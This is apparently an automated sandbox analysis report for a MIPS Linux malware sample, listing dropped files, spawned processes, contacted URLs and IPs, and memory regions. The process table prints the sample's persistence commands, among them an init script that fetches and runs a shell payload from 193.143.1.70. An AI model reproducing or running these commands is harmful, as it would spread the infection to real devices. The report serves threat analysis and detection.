Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
mips.nn.elf
|
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/mips.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.HOCWng (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/mips.nn.elf
|
/tmp/mips.nn.elf
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf
&\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0
{start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/mips.nn.elf
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/tmp/mips.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/lib/systemd/systemd-user-runtime-dir
|
/lib/systemd/systemd-user-runtime-dir stop 127
|
There are 47 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
110.175.238.90
|
unknown
|
Australia
|
||
|
208.149.238.19
|
unknown
|
United States
|
||
|
80.169.156.238
|
unknown
|
United Kingdom
|
||
|
148.92.255.188
|
unknown
|
United States
|
||
|
200.27.250.104
|
unknown
|
Chile
|
||
|
177.46.50.255
|
unknown
|
Brazil
|
||
|
109.24.110.5
|
unknown
|
France
|
||
|
103.111.139.243
|
unknown
|
Indonesia
|
||
|
42.172.22.159
|
unknown
|
China
|
||
|
101.51.185.140
|
unknown
|
Thailand
|
||
|
19.232.95.113
|
unknown
|
United States
|
||
|
75.231.11.20
|
unknown
|
United States
|
||
|
17.245.36.217
|
unknown
|
United States
|
||
|
191.108.95.179
|
unknown
|
Colombia
|
||
|
83.26.135.255
|
unknown
|
Poland
|
||
|
111.1.129.127
|
unknown
|
China
|
||
|
48.142.110.149
|
unknown
|
United States
|
||
|
134.25.21.14
|
unknown
|
Sweden
|
||
|
192.199.136.135
|
unknown
|
United States
|
||
|
206.114.170.56
|
unknown
|
United States
|
||
|
70.165.175.130
|
unknown
|
United States
|
||
|
44.191.199.162
|
unknown
|
United States
|
||
|
169.30.217.31
|
unknown
|
United States
|
||
|
70.215.181.97
|
unknown
|
United States
|
||
|
38.204.82.51
|
unknown
|
United States
|
||
|
158.196.3.1
|
unknown
|
Czech Republic
|
||
|
195.244.201.232
|
unknown
|
Gibraltar
|
||
|
21.160.3.195
|
unknown
|
United States
|
||
|
142.213.199.96
|
unknown
|
Canada
|
||
|
58.181.44.249
|
unknown
|
Korea Republic of
|
||
|
188.245.39.68
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
37.115.11.203
|
unknown
|
Ukraine
|
||
|
135.90.92.249
|
unknown
|
United States
|
||
|
134.145.175.58
|
unknown
|
Netherlands
|
||
|
24.203.12.42
|
unknown
|
Canada
|
||
|
143.169.40.110
|
unknown
|
Belgium
|
||
|
220.92.204.137
|
unknown
|
Korea Republic of
|
||
|
163.215.189.68
|
unknown
|
Japan
|
||
|
124.69.136.101
|
unknown
|
China
|
||
|
12.161.205.248
|
unknown
|
United States
|
||
|
18.80.36.235
|
unknown
|
United States
|
||
|
97.153.83.33
|
unknown
|
United States
|
||
|
150.70.54.185
|
unknown
|
Japan
|
||
|
102.196.43.20
|
unknown
|
unknown
|
||
|
196.34.128.167
|
unknown
|
South Africa
|
||
|
187.141.68.95
|
unknown
|
Mexico
|
||
|
56.199.179.130
|
unknown
|
United States
|
||
|
28.8.120.160
|
unknown
|
United States
|
||
|
205.154.14.81
|
unknown
|
United States
|
||
|
145.245.115.196
|
unknown
|
Switzerland
|
||
|
90.56.12.234
|
unknown
|
France
|
||
|
61.225.171.223
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
43.27.90.166
|
unknown
|
Japan
|
||
|
143.153.251.253
|
unknown
|
United States
|
||
|
165.243.132.153
|
unknown
|
Korea Republic of
|
||
|
137.74.55.109
|
unknown
|
France
|
||
|
115.171.161.29
|
unknown
|
China
|
||
|
195.129.242.69
|
unknown
|
European Union
|
||
|
155.87.116.240
|
unknown
|
United States
|
||
|
86.103.71.255
|
unknown
|
Germany
|
||
|
92.135.115.133
|
unknown
|
France
|
||
|
96.144.74.21
|
unknown
|
United States
|
||
|
59.144.248.225
|
unknown
|
India
|
||
|
174.104.245.67
|
unknown
|
United States
|
||
|
204.48.119.254
|
unknown
|
Reserved
|
||
|
52.175.41.200
|
unknown
|
United States
|
||
|
188.95.17.104
|
unknown
|
Italy
|
||
|
218.60.232.168
|
unknown
|
China
|
||
|
21.169.227.183
|
unknown
|
United States
|
||
|
84.198.238.152
|
unknown
|
Belgium
|
||
|
1.147.140.26
|
unknown
|
Australia
|
||
|
199.38.199.242
|
unknown
|
Saint Lucia
|
||
|
99.59.85.148
|
unknown
|
United States
|
||
|
69.144.223.139
|
unknown
|
United States
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
194.15.50.23
|
unknown
|
United Kingdom
|
||
|
85.253.235.14
|
unknown
|
Estonia
|
||
|
188.137.237.32
|
unknown
|
Bahrain
|
||
|
152.137.215.123
|
unknown
|
United States
|
||
|
170.226.185.128
|
unknown
|
United States
|
||
|
181.39.145.142
|
unknown
|
Ecuador
|
||
|
221.62.86.130
|
unknown
|
Japan
|
||
|
108.103.193.23
|
unknown
|
United States
|
||
|
168.174.84.151
|
unknown
|
United States
|
||
|
67.135.202.30
|
unknown
|
United States
|
||
|
93.247.213.192
|
unknown
|
Germany
|
||
|
173.243.186.12
|
unknown
|
United States
|
||
|
211.148.167.97
|
unknown
|
China
|
||
|
160.47.9.86
|
unknown
|
Germany
|
||
|
215.26.147.50
|
unknown
|
United States
|
||
|
45.249.168.147
|
unknown
|
India
|
||
|
41.33.216.218
|
unknown
|
Egypt
|
||
|
128.126.6.157
|
unknown
|
United States
|
||
|
189.36.197.179
|
unknown
|
Brazil
|
||
|
21.199.87.5
|
unknown
|
United States
|
||
|
58.234.80.129
|
unknown
|
Korea Republic of
|
||
|
161.242.185.197
|
unknown
|
United States
|
||
|
46.32.78.59
|
unknown
|
Russian Federation
|
||
|
86.110.215.196
|
unknown
|
Russian Federation
|
||
|
152.119.110.172
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7fa134422000
|
page execute read
|
|
||
|
7fa134422000
|
page execute read
|
|
||
|
7fff2415c000
|
page execute read
|
|||
|
7fa1b8ce1000
|
page read and write
|
|||
|
7fa1b90a5000
|
page read and write
|
|||
|
7fa1b90c2000
|
page read and write
|
|||
|
7fa1b96fd000
|
page read and write
|
|||
|
7fff24137000
|
page read and write
|
|||
|
7fa1b96fd000
|
page read and write
|
|||
|
7fa1b821b000
|
page read and write
|
|||
|
7fa1b821b000
|
page read and write
|
|||
|
7fa1b974a000
|
page read and write
|
|||
|
7fa1b93f3000
|
page read and write
|
|||
|
7fa1b9082000
|
page read and write
|
|||
|
7fa1b4021000
|
page read and write
|
|||
|
7fa134463000
|
page read and write
|
|||
|
7fa1b95d4000
|
page read and write
|
|||
|
7fa1b4000000
|
page read and write
|
|||
|
55f001e1a000
|
page execute read
|
|||
|
55f0020a2000
|
page read and write
|
|||
|
7fa1b8a23000
|
page read and write
|
|||
|
7fa1b90c2000
|
page read and write
|
|||
|
7fa1b9082000
|
page read and write
|
|||
|
7fa1b93f3000
|
page read and write
|
|||
|
55f004e0f000
|
page read and write
|
|||
|
55f0040c1000
|
page read and write
|
|||
|
55f0020ac000
|
page read and write
|
|||
|
7fa1b974a000
|
page read and write
|
|||
|
7fa1b90a5000
|
page read and write
|
|||
|
7fa1b8a31000
|
page read and write
|
|||
|
55f0040aa000
|
page execute and read and write
|
|||
|
7fff2415c000
|
page execute read
|
|||
|
55f004e0f000
|
page read and write
|
|||
|
7fa1b9705000
|
page read and write
|
|||
|
55f0040aa000
|
page execute and read and write
|
|||
|
7fa134467000
|
page read and write
|
|||
|
55f0020a2000
|
page read and write
|
|||
|
7fa134463000
|
page read and write
|
|||
|
7fa1b8a31000
|
page read and write
|
|||
|
7fa1b9705000
|
page read and write
|
|||
|
7fa1b4000000
|
page read and write
|
|||
|
7fa1b8a23000
|
page read and write
|
|||
|
55f001e1a000
|
page execute read
|
|||
|
55f0040c1000
|
page read and write
|
|||
|
7fa13446c000
|
page read and write
|
|||
|
7fa1b95d4000
|
page read and write
|
|||
|
7fa1b8ce1000
|
page read and write
|
|||
|
7fa1b4021000
|
page read and write
|
|||
|
7fa134467000
|
page read and write
|
|||
|
55f0020ac000
|
page read and write
|
|||
|
7fff24137000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.